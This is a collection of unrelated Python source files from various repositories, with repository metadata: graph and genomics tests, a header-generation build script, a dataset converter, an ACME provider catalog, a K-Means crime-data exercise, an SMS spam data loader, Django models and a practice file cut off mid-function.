794fc589249a0f67eb431bdc67e3e34101fc1481 | 938 | py | Python
graph/BFS/test_BFS.py | s1s1ty/Algo-DS-Implementation | 56c40fe107a48b5562794775d671db88d04594b3 | ["MIT"] | 9 | 2018-03-29T13:03:45.000Z | 2020-01-22T10:42:47.000Z
graph/BFS/test_BFS.py | s1s1ty/Algo-DS-Implementation | 56c40fe107a48b5562794775d671db88d04594b3 | ["MIT"] | null | null | null
graph/BFS/test_BFS.py | s1s1ty/Algo-DS-Implementation | 56c40fe107a48b5562794775d671db88d04594b3 | ["MIT"] | 4 | 2018-03-29T13:06:41.000Z | 2020-11-22T13:58:19.000Z
import unittest
import collections
from BFS import BFSM, BFS
class BFSTestCase(unittest.TestCase):
def test(self):
ob = BFS()
graph = collections.defaultdict(set)
graph[1] = [2, 3, 5]
graph[2] = [8]
graph[3] = [5,4]
graph[8] = [4]
source = 2
destination = 4
ob.bfs(graph, source)
self.assertEqual(ob.cost_print(destination), 2, msg="Cost should be 2")
class BFSMTestCase(unittest.TestCase):
""" Test for BFS.py"""
def test(self):
ob = BFSM()
# test data
ob.am[1][2] = 1
ob.am[1][3] = 1
ob.am[1][5] = 1
ob.am[3][5] = 1
ob.am[8][4] = 1
ob.am[2][8] = 1
ob.am[3][4] = 1
source = 1
destination = 4
ob.bfs(source)
self.assertEqual(ob.cost_print(destination), 2, msg="Cost should be 2")
if __name__ == '__main__':
unittest.main()
| 23.45 | 79 | 0.515991 |

794fc5e890187a35e6c99ed0f6bb8b0042ec1808 | 6,508 | py | Python
mrmpi/oink/Make.py | mkaczanowski/ompi-mutual-friends | 8d3f994fe5fe648332b9c2b09ea2a712a241d6c1 | ["MIT"] | null | null | null
mrmpi/oink/Make.py | mkaczanowski/ompi-mutual-friends | 8d3f994fe5fe648332b9c2b09ea2a712a241d6c1 | ["MIT"] | 1 | 2021-06-12T00:50:08.000Z | 2021-06-15T17:59:12.000Z
mrmpi/oink/Make.py | mkaczanowski/ompi-mutual-friends | 8d3f994fe5fe648332b9c2b09ea2a712a241d6c1 | ["MIT"] | 1 | 2021-06-11T19:34:43.000Z | 2021-06-11T19:34:43.000Z
#!/usr/local/bin/python
# Make.py to create style_*.h files by parsing other files
# Syntax: Make.py
import sys,os,glob,commands,re
# style_command.h
files = glob.glob("*.h")
files.sort()
fp = open("style_command.tmp","w")
for file in files:
txt = open(file,"r").read()
if "COMMAND_CLASS" in txt:
print >>fp,'#include "%s"' % file
fp.close()
if os.path.exists("style_command.h"):
diff = commands.getoutput("diff style_command.h style_command.tmp")
else: diff = 1
if diff: os.rename("style_command.tmp","style_command.h")
else: os.remove("style_command.tmp")
# style_compare.h
files = glob.glob("compare_*.cpp")
files.sort()
hitlist = []
fp = open("style_compare.tmp","w")
print >>fp,"#ifdef COMPARE_STYLE\n"
pattern = re.compile("int \S+?\s*?\([^,\)]+?,[^,\)]+?," +
"[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "int (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"CompareStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_compare.h"):
diff = commands.getoutput("diff style_compare.h style_compare.tmp")
else: diff = 1
if diff: os.rename("style_compare.tmp","style_compare.h")
else: os.remove("style_compare.tmp")
# style_hash.h
files = glob.glob("hash_*.cpp")
files.sort()
hitlist = []
fp = open("style_hash.tmp","w")
print >>fp,"#ifdef HASH_STYLE\n"
pattern = re.compile("int \S+?\s*?\([^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "int (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"HashStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_hash.h"):
diff = commands.getoutput("diff style_hash.h style_hash.tmp")
else: diff = 1
if diff: os.rename("style_hash.tmp","style_hash.h")
else: os.remove("style_hash.tmp")
# style_map.h
files = glob.glob("map_*.cpp")
files.sort()
hitlist = []
fp = open("style_map.tmp","w")
print >>fp,"#if defined MAP_TASK_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"MapStyle(%s)" % funcname[0]
print >>fp,"\n#elif defined MAP_FILE_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?," +
"[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"MapStyle(%s)" % funcname[0]
print >>fp,"\n#elif defined MAP_STRING_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?," +
"[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"MapStyle(%s)" % funcname[0]
print >>fp,"\n#elif defined MAP_MR_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?," +
"[^,\)]+?,[^,\)]+?,[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"MapStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
print >>fp,'#include "mapreduce.h"'
print >>fp,"using MAPREDUCE_NS::MapReduce;"
print >>fp,"using MAPREDUCE_NS::KeyValue;\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_map.h"):
diff = commands.getoutput("diff style_map.h style_map.tmp")
else: diff = 1
if diff: os.rename("style_map.tmp","style_map.h")
else: os.remove("style_map.tmp")
# style_reduce.h
files = glob.glob("reduce_*.cpp")
files.sort()
hitlist = []
fp = open("style_reduce.tmp","w")
print >>fp,"#ifdef REDUCE_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?,"
"[^,\)]+?,[^,\)]+?,[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"ReduceStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
print >>fp,'#include "keyvalue.h"'
print >>fp,"using MAPREDUCE_NS::KeyValue;\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_reduce.h"):
diff = commands.getoutput("diff style_reduce.h style_reduce.tmp")
else: diff = 1
if diff: os.rename("style_reduce.tmp","style_reduce.h")
else: os.remove("style_reduce.tmp")
# style_scan.h
files = glob.glob("scan_*.cpp")
files.sort()
hitlist = []
fp = open("style_scan.tmp","w")
print >>fp,"#if defined SCAN_KV_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?," +
"[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"ScanStyle(%s)" % funcname[0]
print >>fp,"\n#elif defined SCAN_KMV_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?,[^,\)]+?"
",[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"ScanStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_scan.h"):
diff = commands.getoutput("diff style_scan.h style_scan.tmp")
else: diff = 1
if diff: os.rename("style_scan.tmp","style_scan.h")
else: os.remove("style_scan.tmp")
| 24.651515 | 77 | 0.589121 |

794fc5f240d328af07b7f07dc10164c0f176f40c | 7,573 | py | Python
python/glow/hail/tests/test_from_matrix_table.py | mah-databricks/glow | 958fd9480211ca8ac9229f39617e273cd8067f8c | ["Apache-2.0"] | 214 | 2019-10-17T15:10:34.000Z | 2022-03-22T08:09:16.000Z
python/glow/hail/tests/test_from_matrix_table.py | mah-databricks/glow | 958fd9480211ca8ac9229f39617e273cd8067f8c | ["Apache-2.0"] | 433 | 2019-10-15T14:58:10.000Z | 2022-03-30T18:41:27.000Z
python/glow/hail/tests/test_from_matrix_table.py | mah-databricks/glow | 958fd9480211ca8ac9229f39617e273cd8067f8c | ["Apache-2.0"] | 74 | 2019-10-15T14:02:01.000Z | 2022-03-31T19:36:30.000Z
# Copyright 2019 The Glow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from glow.hail import functions
import hail as hl
from pyspark.sql import functions as fx
from pyspark.sql.types import ArrayType, StructType
import pytest
# Check that structs have the same fields and datatypes (not necessarily metadata), in any order
def _compare_struct_types(s1, s2, ignore_fields=[]):
s1_fields = [f for f in s1.fields if f.name not in ignore_fields]
s2_fields = [f for f in s2.fields if f.name not in ignore_fields]
assert set([f.name for f in s1_fields]) == set([f.name for f in s2_fields])
for f1 in s1_fields:
matching_fields = [f2 for f2 in s2_fields if f1.name == f2.name]
assert (len(matching_fields) == 1)
m = matching_fields[0]
if isinstance(m.dataType, ArrayType) and isinstance(m.dataType.elementType, StructType):
_compare_struct_types(f1.dataType.elementType, m.dataType.elementType, ignore_fields)
else:
assert f1.dataType == m.dataType
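# Editor's sketch (illustrative, not one of the original tests): field order is
# deliberately ignored, so two schemas with the same fields in a different
# order are considered equal by _compare_struct_types.
def test_compare_struct_types_ignores_field_order_sketch():
    from pyspark.sql.types import LongType, StringType, StructField
    left = StructType([StructField('a', StringType()), StructField('b', LongType())])
    right = StructType([StructField('b', LongType()), StructField('a', StringType())])
    _compare_struct_types(left, right)  # passes: no AssertionError is raised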
def _assert_lossless_adapter(spark,
tmp_path,
hail_df,
input_file,
in_fmt,
out_fmt,
writer_options={},
reader_options={}):
# Convert Hail MatrixTable to Glow DataFrame and write it to a flat file
output_file = (tmp_path / 'tmp').as_uri() + '.' + in_fmt
writer = hail_df.write.format(out_fmt)
for key, value in writer_options.items():
writer = writer.option(key, value)
writer.save(output_file)
# Assert that reread DF has the same schema (excluding metadata/order)
reader = spark.read.format(in_fmt)
for key, value in reader_options.items():
reader = reader.option(key, value)
round_trip_df = reader.load(output_file)
glow_df = reader.load(input_file)
_compare_struct_types(glow_df.schema, round_trip_df.schema)
# Assert that no data is lost
matching_df = spark.read.format(in_fmt).schema(glow_df.schema).load(output_file)
assert matching_df.subtract(glow_df).count() == 0
assert glow_df.subtract(matching_df).count() == 0
def test_vcf(spark, tmp_path):
input_vcf = 'test-data/CEUTrio.HiSeq.WGS.b37.NA12878.20.21.vcf'
hail_df = functions.from_matrix_table(hl.import_vcf(input_vcf))
_assert_lossless_adapter(spark, tmp_path, hail_df, input_vcf, 'vcf', 'vcf')
def test_gvcf(spark, tmp_path):
input_vcf = 'test-data/NA12878_21_10002403.g.vcf'
hail_df = functions.from_matrix_table(hl.import_vcf(input_vcf))
_assert_lossless_adapter(spark, tmp_path, hail_df, input_vcf, 'vcf', 'vcf')
def test_gvcfs(spark, tmp_path):
# GVCF MatrixTables are not keyed by locus and alleles, just by locus
input_vcf = 'test-data/tabix-test-vcf/combined.chr20_18210071_18210093.g.vcf.gz'
partitions = [
hl.Interval(hl.Locus("chr20", 1, reference_genome='GRCh38'),
hl.Locus("chr20", 20000000, reference_genome='GRCh38'),
includes_end=True)
]
hail_df = functions.from_matrix_table(
hl.import_gvcfs([input_vcf], partitions, force_bgz=True, reference_genome='GRCh38')[0])
_assert_lossless_adapter(spark, tmp_path, hail_df, input_vcf, 'vcf', 'bigvcf')
def test_annotated_sites_only_vcf(spark, tmp_path):
# The Hail DataFrame will not have the split CSQ/ANN fields, as it does not have
# the VCF header metadata; we include the header when writing the round-trip VCF.
input_vcf = 'test-data/vcf/vep.vcf'
hail_df = functions.from_matrix_table(hl.import_vcf(input_vcf))
_assert_lossless_adapter(spark,
tmp_path,
hail_df,
input_vcf,
'vcf',
'vcf',
writer_options={'vcfHeader': input_vcf})
def test_exclude_sample_ids(spark, tmp_path):
input_vcf = 'test-data/NA12878_21_10002403.vcf'
hail_df = functions.from_matrix_table(hl.import_vcf(input_vcf), include_sample_ids=False)
hail_with_sample_id_df = functions.from_matrix_table(hl.import_vcf(input_vcf))
with pytest.raises(AssertionError):
_compare_struct_types(hail_df.schema, hail_with_sample_id_df.schema)
_assert_lossless_adapter(spark,
tmp_path,
hail_df,
input_vcf,
'vcf',
'vcf',
reader_options={'includeSampleIds': 'false'})
def test_unphased_bgen(spark, tmp_path):
spark.conf.set('spark.sql.autoBroadcastJoinThreshold', '-1')
input_bgen = 'test-data/bgen/example.8bits.bgen'
hl.index_bgen(input_bgen, reference_genome=None)
hail_df = functions.from_matrix_table(hl.import_bgen(input_bgen, entry_fields=['GP']))
_assert_lossless_adapter(spark,
tmp_path,
hail_df,
input_bgen,
'bgen',
'bigbgen',
writer_options={'bitsPerProbability': '8'})
def test_plink(spark):
input_base = 'test-data/plink/five-samples-five-variants/bed-bim-fam/test'
# Do not recode contigs (eg. 23 -> X)
hail_df = functions.from_matrix_table(
hl.import_plink(bed=input_base + '.bed',
bim=input_base + '.bim',
fam=input_base + '.fam',
reference_genome=None,
contig_recoding={}))
# Hail does not set the genotype if it is missing; the Glow PLINK reader sets the calls to (-1, -1)
# Hail sets the genotype phased=False when reading from PLINK if the genotype is present;
# the Glow PLINK reader does not as it is always false
glow_df = spark.read.format('plink') \
.option('mergeFidIid', 'false') \
.load(input_base + '.bed')
_compare_struct_types(hail_df.schema, glow_df.schema, ignore_fields=['phased'])
matching_glow_df = glow_df.withColumn(
'genotypes',
fx.expr(
"transform(genotypes, gt -> named_struct('sampleId', gt.sampleId, 'calls', ifnull(gt.calls, array(-1,-1)), 'phased', if(gt.calls = array(-1, -1), null, false)))"
))
matching_hail_df = hail_df.select(*glow_df.schema.names)
assert matching_hail_df.subtract(matching_glow_df).count() == 0
assert matching_glow_df.subtract(matching_hail_df).count() == 0
def test_missing_locus():
input_vcf = 'test-data/1kg_sample.vcf'
mt = hl.import_vcf(input_vcf).key_rows_by('alleles').drop('locus')
with pytest.raises(ValueError):
functions.from_matrix_table(mt)
def test_missing_alleles():
input_vcf = 'test-data/1kg_sample.vcf'
mt = hl.import_vcf(input_vcf).key_rows_by('locus').drop('alleles')
with pytest.raises(ValueError):
functions.from_matrix_table(mt)
| 43.774566 | 173 | 0.643866 |

794fc7ecd02b6f16b8b020ad2062d59e3217ea69 | 2,389 | py | Python
tools/accuracy_checker/openvino/tools/accuracy_checker/annotation_converters/see_in_the_dark.py | TolyaTalamanov/open_model_zoo | 1697e60712df4ca72635a2080a197b9d3bc24129 | ["Apache-2.0"] | 2,201 | 2018-10-15T14:37:19.000Z | 2020-07-16T02:05:51.000Z
tools/accuracy_checker/openvino/tools/accuracy_checker/annotation_converters/see_in_the_dark.py | Pandinosaurus/open_model_zoo | 2543996541346418919c5cddfb71e33e2cdef080 | ["Apache-2.0"] | 759 | 2018-10-18T07:43:55.000Z | 2020-07-16T01:23:12.000Z
tools/accuracy_checker/openvino/tools/accuracy_checker/annotation_converters/see_in_the_dark.py | Pandinosaurus/open_model_zoo | 2543996541346418919c5cddfb71e33e2cdef080 | ["Apache-2.0"] | 808 | 2018-10-16T14:03:49.000Z | 2020-07-15T11:41:45.000Z
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pathlib import Path
from .format_converter import FileBasedAnnotationConverter, ConverterReturn
from ..representation import ImageProcessingAnnotation
from ..representation.image_processing import GTLoader
from ..utils import read_txt, check_file_existence
class SeeInTheDarkDatasetConverter(FileBasedAnnotationConverter):
__provider__ = 'see_in_the_dark'
def convert(self, check_content=False, progress_callback=None, progress_interval=100, **kwargs):
images_list = read_txt(self.annotation_file)
annotations = []
content_errors = None if not check_content else []
num_images = len(images_list)
for idx, line in enumerate(images_list):
input_image, gt_image = line.split(' ')[:2]
identifier = Path(input_image).name
gt_identifier = Path(gt_image).name
in_exposure = float(identifier[9:-5])
            gt_exposure = float(gt_identifier[9:-5])
ratio = min(gt_exposure / in_exposure, 300)
if check_content:
if not check_file_existence(self.annotation_file.parent / input_image):
content_errors.append('{}: does not exist'.format(self.annotation_file.parent / input_image))
if not check_file_existence(self.annotation_file.parent / gt_image):
content_errors.append('{}: does not exist'.format(self.annotation_file.parent / gt_image))
annotation = ImageProcessingAnnotation(identifier, gt_identifier, gt_loader=GTLoader.RAWPY)
annotation.metadata['ratio'] = ratio
annotations.append(annotation)
            if progress_callback and idx % progress_interval == 0:
progress_callback(idx * 100 / num_images)
return ConverterReturn(annotations, None, content_errors)
| 47.78 | 113 | 0.714525 |

794fc8044a33048ff270eeba53862e6f1b42c964 | 2,472 | py | Python
sewer/catalog.py | kylejohnson/sewer | 056ac64fe294fb284ec5b920ec1a9425dd254e92 | ["MIT"] | 135 | 2017-12-31T22:01:33.000Z | 2022-01-20T18:18:11.000Z
sewer/catalog.py | kylejohnson/sewer | 056ac64fe294fb284ec5b920ec1a9425dd254e92 | ["MIT"] | 149 | 2018-01-10T10:36:18.000Z | 2021-07-01T16:22:47.000Z
sewer/catalog.py | kylejohnson/sewer | 056ac64fe294fb284ec5b920ec1a9425dd254e92 | ["MIT"] | 61 | 2018-03-05T16:58:55.000Z | 2021-05-21T01:30:07.000Z
import codecs, importlib, json, os
from typing import Dict, List, Sequence
from .auth import ProviderBase
class ProviderDescriptor:
def __init__(
self,
*,
name: str,
desc: str,
chals: Sequence[str],
args: Sequence[Dict[str, str]],
deps: Sequence[str],
path: str = None,
cls: str = None,
features: Sequence[str] = None,
memo: str = None,
) -> None:
"initialize a driver descriptor from one item in the catalog"
self.name = name
self.desc = desc
self.chals = chals
self.args = args
self.deps = deps
self.path = path
self.cls = cls
self.features = [] if features is None else features
self.memo = memo
def __str__(self) -> str:
return "Descriptor %s" % self.name
def get_provider(self) -> ProviderBase:
"return the class that implements this driver"
module_name = self.path if self.path else ("sewer.providers." + self.name)
module = importlib.import_module(module_name)
return getattr(module, self.cls if self.cls else "Provider")
class ProviderCatalog:
    def __init__(self, filepath: str = "") -> None:
        "initialize a catalog from either the default catalog.json or one named by filepath"
if not filepath:
here = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(here, "catalog.json")
with codecs.open(filepath, "r", encoding="utf8") as f:
raw_catalog = json.load(f)
items = {} # type: Dict[str, ProviderDescriptor]
for item in raw_catalog:
k = item["name"]
if k in items:
print("WARNING: duplicate name %s skipped in catalog %s" % (k, filepath))
else:
items[k] = ProviderDescriptor(**item)
self.items = items
def get_item_list(self) -> List[ProviderDescriptor]:
"return the list of items in the catalog, sorted by name"
res = [i for i in self.items.values()]
res.sort(key=lambda i: i.name)
return res
def get_descriptor(self, name: str) -> ProviderDescriptor:
"return the ProviderDescriptor that matches name"
return self.items[name]
def get_provider(self, name: str) -> ProviderBase:
"return the class that implements the named driver"
return self.get_descriptor(name).get_provider()
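# Editor's sketch (usage illustration, not part of sewer): enumerate the
# drivers described by the bundled catalog.json and resolve one of them to its
# implementing class.  The driver name "cloudflare" is an assumption about the
# catalog's contents.
if __name__ == "__main__":
    catalog = ProviderCatalog()  # loads the catalog.json next to this module
    for descriptor in catalog.get_item_list():
        print(descriptor.name, descriptor.chals, descriptor.deps)
    # provider_cls = catalog.get_provider("cloudflare")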
| 31.291139 | 91 | 0.601537 |

794fca761acfc988e57563c500c6b9c9ef668e2d | 2,627 | py | Python
Module5/assignment1.py | sidbose/PythonForDataScienceBasics | 191f56904b1fefebd441e3fde63f52b6936959d8 | ["MIT"] | null | null | null
Module5/assignment1.py | sidbose/PythonForDataScienceBasics | 191f56904b1fefebd441e3fde63f52b6936959d8 | ["MIT"] | null | null | null
Module5/assignment1.py | sidbose/PythonForDataScienceBasics | 191f56904b1fefebd441e3fde63f52b6936959d8 | ["MIT"] | null | null | null
#
# TODO: Import whatever needs to be imported to make this work
#
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
from sklearn.cluster import KMeans
# Look Pretty
# matplotlib.style.use('ggplot')
plt.style.use('ggplot')
#
# TODO: To procure the dataset, follow these steps:
# 1. Navigate to: https://data.cityofchicago.org/Public-Safety/Crimes-2001-to-present/ijzp-q8t2
# 2. In the 'Primary Type' column, click on the 'Menu' button next to the info button,
# and select 'Filter This Column'. It might take a second for the filter option to
# show up, since it has to load the entire list first.
# 3. Scroll down to 'GAMBLING'
# 4. Click the light blue 'Export' button next to the 'Filter' button, and select 'Download As CSV'
def doKMeans(df):
#
# INFO: Plot your data with a '.' marker, with 0.3 alpha at the Longitude,
# and Latitude locations in your dataset. Longitude = x, Latitude = y
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(df.Longitude, df.Latitude, marker='.', alpha=0.3, c='green')
#
# TODO: Filter df so that you're only looking at Longitude and Latitude,
# since the remaining columns aren't really applicable for this purpose.
#
k_means_data = df[['Longitude', 'Latitude']]
#
# TODO: Use K-Means to try and find seven cluster centers in this df.
# Be sure to name your kmeans model `model` so that the printing works.
#
kmeans_model = KMeans(n_clusters=7)
kmeans_model.fit(k_means_data)
#
# INFO: Print and plot the centroids...
centroids = kmeans_model.cluster_centers_
ax.scatter(centroids[:,0], centroids[:,1], marker='^', c='red', alpha=0.9, linewidths=3, s=169)
    print(centroids)
#
# TODO: Load your dataset after importing Pandas
#
df = pd.read_csv('Datasets/Crimes.csv')
#
# TODO: Drop any ROWs with nans in them
#
df.dropna(axis=0, how='any', inplace=True)
df = df.reset_index(drop=True)
#
# TODO: Print out the dtypes of your dset
#
print(df.dtypes)
#
# Coerce the 'Date' feature (which is currently a string object) into real date,
# and confirm by re-printing the dtypes. NOTE: This is a slow process...
#
df['Date'] = pd.to_datetime(df['Date'])
print(df.dtypes)
# INFO: Print & Plot your data
doKMeans(df)
#
# TODO: Filter out the data so that it only contains samples that have
# a Date > '2011-01-01', using indexing. Then, in a new figure, plot the
# crime incidents, as well as a new K-Means run's centroids.
#
df = df[df['Date'] > '2011-01-01']
# INFO: Print & Plot your data
doKMeans(df)
plt.show()
| 27.652632 | 100 | 0.680244 |

794fcbf16641ea1a76a46c1b9b03ea6b0192d253 | 2,319 | py | Python
djnic/cambios/models.py | avdata99/nic | 70399bd78fd2b4b496d338e7959867ad12cdf477 | ["MIT"] | 8 | 2021-05-01T13:03:22.000Z | 2021-12-17T21:50:04.000Z
djnic/cambios/models.py | avdata99/nic | 70399bd78fd2b4b496d338e7959867ad12cdf477 | ["MIT"] | 16 | 2020-11-20T23:18:22.000Z | 2021-04-08T20:09:35.000Z
djnic/cambios/models.py | OpenDataCordoba/nic | f9528856e13d106bdfb476cab1236bc5b8a92183 | ["MIT"] | null | null | null
from django.db import models
from registrantes.models import Registrante
class CambiosDominio(models.Model):
    """ A check of a domain (whether or not it had any changes) """
dominio = models.ForeignKey('dominios.Dominio', on_delete=models.CASCADE, related_name='cambios')
momento = models.DateTimeField()
    # used when importing the "vistos" table and merging it with this already-imported table (that's why the default is True)
have_changes = models.BooleanField(default=True)
def __str__(self):
return f'{self.dominio} {self.momento}'
    def registrantes_en_cambio(self):
        """ If the registrant changed, return the new one and the previous one """
registrante_anterior = None
registrante_nuevo = None
for campo in self.campos.all():
if campo.campo == 'registrant_legal_uid':
if campo.anterior != '':
registrante_anterior = Registrante.objects.filter(legal_uid=campo.anterior).first()
if campo.nuevo != '':
registrante_nuevo = Registrante.objects.filter(legal_uid=campo.nuevo).first()
return registrante_anterior, registrante_nuevo
class CampoCambio(models.Model):
    """ Each of the fields that changed.
    All stored as strings even when they are dates.
    The DNS fields are problematic because the previous system had 5
    separate fields and it is now done properly.
    """
cambio = models.ForeignKey(CambiosDominio, on_delete=models.CASCADE, related_name='campos')
campo = models.CharField(max_length=240, null=True, db_index=True)
anterior = models.CharField(max_length=240, null=True)
nuevo = models.CharField(max_length=240, null=True)
uid_anterior = models.IntegerField(default=0, db_index=True, help_text="to be deleted after migration")
def __str__(self):
campo = self.campo or ''
anterior = self.anterior or ''
nuevo = self.nuevo or ''
return f'{campo} from {anterior} to {nuevo}'
    def brother(self, campo):
        """ Changed field from the same change, selected by field name """
return self.cambio.campos.filter(campo=campo).first()
def brother_registrant_name(self):
return self.brother(campo='registrant_name')
def brother_expire(self):
return self.brother(campo='dominio_expire')
| 39.305085 | 107 | 0.675722 |

794fcbf6f1bc104288d2eac3977910ad2a3029bc | 1,306 | py | Python
src/make_dataframe.py | datavistics/sms_spam | d858fdd25371979b42fb66093866479fe098aff0 | ["BSD-3-Clause"] | null | null | null
src/make_dataframe.py | datavistics/sms_spam | d858fdd25371979b42fb66093866479fe098aff0 | ["BSD-3-Clause"] | null | null | null
src/make_dataframe.py | datavistics/sms_spam | d858fdd25371979b42fb66093866479fe098aff0 | ["BSD-3-Clause"] | null | null | null
import zipfile
from pathlib import Path
import pandas as pd
import requests
project_dir = Path(__file__).parents[1]
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00228/smsspamcollection.zip'
data_path = project_dir / 'data' / 'smsspamcollection.zip'
file_path = project_dir / 'data' / 'SMSSpamCollection'
def download_data():
"""
Download project data
:return:
"""
r = requests.get(url, allow_redirects=True)
open(data_path, 'wb').write(r.content)
print('Downloading Zip file: ', str(data_path))
def unzip_data():
"""
Unzip data that was downloaded
:return:
"""
assert data_path.is_file(), 'You need to double check the download code'
zip_ref = zipfile.ZipFile(data_path, 'r')
zip_ref.extractall(data_path.parent)
zip_ref.close()
print('Unzipping Zip file: ', str(data_path))
def make_dataframe():
"""
Create dataframe from tsv file
:return:
"""
assert file_path.is_file(), 'You need to double check the unzipping code'
df = pd.read_csv(file_path, sep='\t', names=['label', 'text'])
return df
def master_data_handler():
if not data_path.is_file():
download_data()
if not file_path.is_file():
unzip_data()
if __name__ == '__main__':
master_data_handler()
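# Editor's sketch (usage illustration, not part of the original script): after
# master_data_handler() has ensured the raw file exists, make_dataframe()
# yields a two-column frame (label, text) whose class balance can be inspected.
def label_counts():
    master_data_handler()
    df = make_dataframe()
    return df['label'].value_counts()  # e.g. ham vs. spam message counts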
| 23.745455
| 93
| 0.674579
|
794fcc2d867456fa71cc034dd4048ec7bc1f178a
| 3,070
|
py
|
Python
|
assets/misc/Algorithm_practice/test.py
|
oliviapy960825/oliviapy960825.github.io
|
7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde
|
[
"CC-BY-3.0"
] | null | null | null |
assets/misc/Algorithm_practice/test.py
|
oliviapy960825/oliviapy960825.github.io
|
7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde
|
[
"CC-BY-3.0"
] | null | null | null |
assets/misc/Algorithm_practice/test.py
|
oliviapy960825/oliviapy960825.github.io
|
7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde
|
[
"CC-BY-3.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 17 16:38:08 2020
@author: wangpeiyu
"""
"""
a1='11000000 10101000 00000001 00000001'
b='11111111 11111111 11111111 11110000'
a2='11000000 10101000 00000001 00000000'
"""
"""
def BFS(length, matrix,row,col,count):
while row<length-1 and col<length-1:
if matrix[row][col+1]==1 and matrix[row+1][col]==1 and matrix[row+1][col+1]==1:
count+=1
return BFS(length,matrix,row+1,col+1,count)
def max_area(length, matrix):
count=1
for i in range(length):
for j in range(length):
if matrix[i][j]==1:
count=max(count,BFS(length,matrix,0,0,1))
return (count**2)
length=3
matrix=[[1,1,0],[1,1,1],[1,1,0]]
print(max_area(length,matrix))
print("{0:b}".format(192))
print("192.68".split("."))
a1='11000000 10101000 00000001 00000001'
b='11111111 11111111 11111111 11110000'
print(1 & 2)
"""
import random
def find_alter(string):
stack=[]#using stack to record/memorize the index of '{' and '}'
index=0 #starting from index 0
def helper(string,start_index,end_index): #helper function to help decide on the alternative text between '{' and '}'
middle_string=string[start_index+1:end_index] # we extract the substring between the start and end index
